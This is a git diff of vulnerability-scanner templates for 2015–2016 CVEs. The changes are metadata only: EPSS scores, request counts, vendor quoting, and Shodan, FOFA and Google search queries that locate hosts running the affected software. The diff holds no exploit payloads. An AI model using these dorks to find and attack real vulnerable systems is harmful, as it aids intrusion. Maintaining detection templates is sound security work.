b/http/cves/2015/CVE-2015-3035.yaml index fee2ae86dc..8ae12b1160 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: tp-link product: tl-wr841n_\(9.0\)_firmware - shodan-query: http.title:"TP-LINK" + shodan-query: + - http.title:"TP-LINK" + - http.title:"tp-link" fofa-query: title="tp-link" google-query: intitle:"tp-link" tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 68f3b923e4..e346766e9c 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - epss-score: 0.83225 - epss-percentile: 0.98353 + epss-score: 0.74714 + epss-percentile: 0.98145 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index f569a4a3d6..86fc569bd0 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91867 + epss-percentile: 0.92055 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index d8b1138b67..c4ce2d34c6 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -25,9 +25,9 @@ info: epss-percentile: 0.71383 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: church_admin_project - product: church_admin + max-request: 2 + vendor: "church_admin_project" + product: "church_admin" framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 5b94f1ef77..65298dc77b 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -19,10 +19,11 @@ info: epss-percentile: 0.97673 cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:* metadata: - vendor: aviary_image_editor_add-on_for_gravity_forms_project - product: aviary_image_editor_add-on_for_gravity_forms + max-request: 2 + vendor: "aviary_image_editor_add-on_for_gravity_forms_project" + product: "aviary_image_editor_add-on_for_gravity_forms" framework: wordpress - tags: cve,cve2015,packetstorm,intrusive,file-upload + tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 7fd1a2a4de..df3f64f1c3 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - epss-score: 0.02176 - epss-percentile: 0.88248 + epss-score: 0.01853 + epss-percentile: 0.88325 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index dd3b643cd6..2d5badcfb8 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -21,12 +21,11 @@ info: epss-percentile: 0.52637 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: sourceafrica_project + max-request: 2 + vendor: "sourceafrica_project" product: sourceafrica framework: wordpress tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project - flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 622cd844c2..098d5904c1 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -20,14 +20,17 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7297 cwe-id: CWE-89 - epss-score: 0.97564 - epss-percentile: 0.99999 + epss-score: 0.97553 + epss-percentile: 0.99997 cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.html:"joomla! - open source content management" + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve2015,cve,packetstorm,joomla,sqli variables: diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 422a417664..3de57a882e 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ibm product: tivoli_common_reporting - shodan-query: http.html:"IBM WebSphere Portal" + shodan-query: + - http.html:"IBM WebSphere Portal" + - http.html:"ibm websphere portal" fofa-query: body="ibm websphere portal" tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index f2bf1ff6ad..0a43cd3c2a 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.50407 + epss-percentile: 0.51315 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index c1fc09a7f9..39e49a1d8e 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -20,15 +20,17 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.61409 + epss-percentile: 0.6128 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kentico product: kentico_cms - google-query: intitle:"kentico database setup" - shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + shodan-query: + - cpe:"cpe:2.3:a:kentico:kentico_cms" + - http.title:"kentico database setup" fofa-query: title="kentico database setup" + google-query: intitle:"kentico database setup" tags: cve2015,cve,kentico,redirect,packetstorm http: diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 3d9d6e38f9..fbce9c9e13 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: atlassian product: confluence - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - cpe:"cpe:2.3:a:atlassian:confluence" + - http.component:"atlassian confluence" tags: cve2015,cve,edb,atlassian,confluence http: diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 080ab4b3b4..fad286f9a3 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.44236 cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpsymposiumpro - product: wp-symposium + product: "wp-symposium" framework: wordpress - google-query: inurl:"/wp-content/plugins/wp-symposium" + google-query: "inurl:\"/wp-content/plugins/wp-symposium\"" tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 471468b2a2..8f4d62034d 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: adobe product: dispatcher - shodan-query: http.component:"Adobe Experience Manager" + shodan-query: + - http.component:"Adobe Experience Manager" + - http.component:"adobe experience manager" tags: cve2016,cve,adobe,aem http: diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index f40b9e4e12..89ba5a6ffa 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -24,11 +24,11 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: admin-font-editor_project - product: admin-font-editor + max-request: 2 + vendor: "admin-font-editor_project" + product: "admin-font-editor" framework: wordpress - google-query: inurl:"/wp-content/plugins/admin-font-editor" + google-query: "inurl:\"/wp-content/plugins/admin-font-editor\"" tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 1a8d355c70..c9bd532243 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: ajax-random-post_project - product: ajax-random-post + max-request: 2 + vendor: "ajax-random-post_project" + product: "ajax-random-post" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index b2e7b90058..6e131a074e 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -20,13 +20,12 @@ info: epss-percentile: 0.41115 cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: anti-plagiarism_project - product: anti-plagiarism + max-request: 2 + vendor: "anti-plagiarism_project" + product: "anti-plagiarism" framework: wordpress - google-query: inurl:"/wp-content/plugins/anti-plagiarism" + google-query: "inurl:\"/wp-content/plugins/anti-plagiarism\"" tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 34e43a1d37..3340718a8b 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.4505 cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: defa-online-image-protector_project - product: defa-online-image-protector + max-request: 2 + vendor: "defa-online-image-protector_project" + product: "defa-online-image-protector" framework: wordpress - google-query: inurl:"/wp-content/plugins/defa-online-image-protector" + google-query: "inurl:\"/wp-content/plugins/defa-online-image-protector\"" tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 5d9ad2fd2a..e17b763428 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -22,13 +22,12 @@ info: epss-percentile: 0.38905 cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: e-search_project - product: e-search + max-request: 2 + vendor: "e-search_project" + product: "e-search" framework: wordpress - google-query: inurl:"/wp-content/plugins/e-search" + google-query: "inurl:\"/wp-content/plugins/e-search\"" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index fc0fa74dd2..80e66dec13 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -23,11 +23,11 @@ info: epss-percentile: 0.44874 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: e-search_project + max-request: 2 + vendor: "e-search_project" product: esearch framework: wordpress - google-query: inurl:"/wp-content/plugins/e-search" + google-query: "inurl:\"/wp-content/plugins/e-search\"" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 2cd03ee293..a58dfc6b01 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.44389 cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: cminds - product: tooltip_glossary + product: "tooltip_glossary" framework: wordpress - google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" + google-query: "inurl:\"/wp-content/plugins/enhanced-tooltipglossary\"" tags: cve2016,cve,wordpress,xss,wp-plugin,cminds - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 5dab7dd47a..bc896b113b 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -23,11 +23,11 @@ info: epss-percentile: 0.4984 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: designsandcode - product: forget_about_shortcode_buttons + product: "forget_about_shortcode_buttons" framework: wordpress - google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" + google-query: "inurl:\"/wp-content/plugins/forget-about-shortcode-buttons\"" tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 6dfae57ab4..20e96a956f 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -23,13 +23,12 @@ info: epss-percentile: 0.41177 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hdw-tube_project - product: hdw-tube + max-request: 2 + vendor: "hdw-tube_project" + product: "hdw-tube" framework: wordpress - google-query: inurl:"/wp-content/plugins/hdw-tube" + google-query: "inurl:\"/wp-content/plugins/hdw-tube\"" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 3200c40f7c..4c05d8b833 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -19,17 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hdw-tube_project - product: hdw-tube + max-request: 2 + vendor: "hdw-tube_project" + product: "hdw-tube" framework: wordpress - google-query: inurl:"/wp-content/plugins/hdw-tube" + google-query: "inurl:\"/wp-content/plugins/hdw-tube\"" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index d3d5d6f1ab..71b0189969 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -11,22 +11,22 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://wordpress.org/plugins/heat-trackr - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000136 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45775 + epss-percentile: 0.46028 cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: heat-trackr_project - product: heat-trackr + max-request: 2 + vendor: "heat-trackr_project" + product: "heat-trackr" framework: wordpress - google-query: inurl:"/wp-content/plugins/heat-trackr" + google-query: "inurl:\"/wp-content/plugins/heat-trackr\"" tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 3329ca918e..209d26fde6 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.44874 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: hero-maps-pro_project - product: hero-maps-pro + max-request: 2 + vendor: "hero-maps-pro_project" + product: "hero-maps-pro" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 34be76c15a..02b6538cfa 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -24,11 +24,11 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: indexisto_project + max-request: 2 + vendor: "indexisto_project" product: indexisto framework: wordpress - google-query: inurl:"/wp-content/plugins/indexisto" + google-query: "inurl:\"/wp-content/plugins/indexisto\"" tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 2c6a1ed852..e517b9ff9a 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.44389 cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: infusionsoft_project + max-request: 2 + vendor: "infusionsoft_project" product: infusionsoft framework: wordpress - google-query: inurl:"/wp-content/plugins/infusionsoft" + google-query: "inurl:\"/wp-content/plugins/infusionsoft\"" tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index f854b63dfe..9d70a0c75e 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.45851 cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: new-year-firework_project - product: new-year-firework + max-request: 2 + vendor: "new-year-firework_project" + product: "new-year-firework" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 75ea4696c2..7e2a1e2e90 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -22,11 +22,11 @@ info: epss-percentile: 0.4984 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: page-layout-builder_project - product: page-layout-builder + max-request: 2 + vendor: "page-layout-builder_project" + product: "page-layout-builder" framework: wordpress - google-query: inurl:"/wp-content/plugins/page-layout-builder" + google-query: "inurl:\"/wp-content/plugins/page-layout-builder\"" tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 94c22a42c1..853a373c6a 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.41915 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: parsi-font_project - product: parsi-font + max-request: 2 + vendor: "parsi-font_project" + product: "parsi-font" framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 087d6bab4b..75ffcb78ca 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.48963 cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: photoxhibit_project + max-request: 2 + vendor: "photoxhibit_project" product: photoxhibit framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 5d2a4945d5..057c127a47 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -22,12 +22,11 @@ info: epss-percentile: 0.45775 cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: pondol-formmail_project - product: pondol-formmail + max-request: 2 + vendor: "pondol-formmail_project" + product: "pondol-formmail" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 4e63553106..b409ecb628 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: s3-video_project - product: s3-video + max-request: 2 + vendor: "s3-video_project" + product: "s3-video" framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index adae5de88a..b9128760ca 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.46028 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: simpel-reserveren_project - product: simpel-reserveren + max-request: 2 + vendor: "simpel-reserveren_project" + product: "simpel-reserveren" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 98f49f7d73..247c5cd4b0 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -22,12 +22,11 @@ info: epss-percentile: 0.63018 cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: tidio-form_project - product: tidio-form + max-request: 2 + vendor: "tidio-form_project" + product: "tidio-form" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 9390314db9..00d9b940b5 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -20,16 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: tidio-gallery_project - product: tidio-gallery + max-request: 2 + vendor: "tidio-gallery_project" + product: "tidio-gallery" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index f79d3fc41b..de3fd21e68 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -23,7 +23,7 @@ info: epss-percentile: 0.4984 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: browserweb product: whizz framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 9f3ac293c7..1b464facce 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -22,9 +22,9 @@ info: epss-percentile: 0.41915 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpsolr - product: wpsolr-search-engine + product: "wpsolr-search-engine" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index e1a3875b5a..f4bab3aec1 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: icon_hash=892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve2016,cve,zabbix,sqli,vulhub diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index f99d4589fe..86bc158dd4 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: opsview product: opsview - shodan-query: title:"Opsview" + shodan-query: + - title:"Opsview" + - http.title:"opsview" fofa-query: title="opsview" google-query: intitle:"opsview" tags: cve2016,cve,opsview,lfi diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 7c8f173112..64352a6e12 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -6,29 +6,29 @@ info: severity: medium description: | WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://wpvulndb.com/vulnerabilities/8431 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - https://github.com/0xkucing/CVE-2016-10993 - https://github.com/ARPSyndicate/cvemon + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. classification: cvss-metrics: 